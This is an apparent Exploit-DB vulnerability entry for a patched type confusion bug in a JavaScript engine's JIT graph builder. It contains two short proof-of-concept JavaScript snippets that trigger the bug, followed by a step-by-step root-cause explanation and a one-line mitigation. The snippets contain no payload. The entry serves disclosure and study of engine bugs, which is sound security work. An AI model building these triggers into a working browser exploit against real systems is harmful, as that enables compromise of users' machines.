PoC for Type Confusion Vulnerability in JavaScript

vendor:

N/A

by:

Anonymous

8.8

CVSS

HIGH

Type Confusion

843

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2020

PoC for Type Confusion Vulnerability in JavaScript

A type confusion vulnerability exists in JavaScript due to the LdaNamedProperty operation 'opt.x' being lowered to a graph exit in the graph builder. This set the current environment to nullptr, which caused the context value to remain as 'undefined'. However, GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.

Mitigation:

Ensure that the environment is not set to nullptr when the LdaNamedProperty operation is lowered to a graph exit.

Source

Exploit-DB raw data:

PoC:
function* opt(arg = () => arg) {
    let tmp = opt.x;  // LdaNamedProperty
    for (;;) {
        arg;
        yield;

        function inner() {
            tmp;
        }

        break;
    }
}

for (let i = 0; i < 100000; i++) {
    opt();
}

/*
PoC for release build:
function* opt(arg = () => {
    arg;
    this;
}, opt) {
    let tmp = arg.x;
    for (;;) {
        arg;
        yield;

        tmp = {
            inner() {
                tmp;
            }
        };
    }
}

for (let i = 0; i < 10000; i++) {
    opt();
}

What happened:
1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction).
2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined".
3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.
*/